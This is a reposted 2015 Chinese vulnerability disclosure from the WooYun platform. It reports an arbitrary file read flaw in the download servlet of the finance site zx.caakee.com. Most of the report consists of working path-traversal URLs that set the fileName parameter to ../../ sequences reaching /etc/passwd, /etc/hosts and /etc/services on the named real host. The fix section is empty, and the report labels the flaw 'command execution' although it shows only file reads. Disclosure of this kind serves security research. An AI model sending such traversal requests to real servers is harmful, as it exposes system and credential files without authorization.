转载

财客在线某处任意文件读取漏洞

漏洞标题 财客在线某处任意文件读取漏洞
相关厂商 财客在线
漏洞作者 路人甲
提交时间 2015-07-29 22:07
公开时间 2015-09-12 22:08
漏洞类型 命令执行
危害等级
自评Rank 20
漏洞状态 未联系到厂商或者厂商积极忽略
Tags标签 补丁不及时,远程命令执行

漏洞详情

通过下载用户的一个XLS表格

获得下载地址:

http://zx.caakee.com/servlet/download?fileName=caakee_importAccount.xls

在filename参数写入../../../../../../../../../../etc/passwd

即可弹出下载

财客在线某处任意文件读取漏洞

打开后

财客在线某处任意文件读取漏洞

zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/hosts

财客在线某处任意文件读取漏洞

财客在线某处任意文件读取漏洞

漏洞证明:

zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/hosts
zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/services

修复方案:

版权声明:转载请注明来源 路人甲 @ 乌云

【本文版权归安全脉搏所有,未经许可不得转载。文章仅代表作者看法,如有不同观点,欢迎添加安全脉搏微信号:SecPulse,进行交流。】

Tags: 补丁不及时 远程命令执行

正文到此结束
Loading...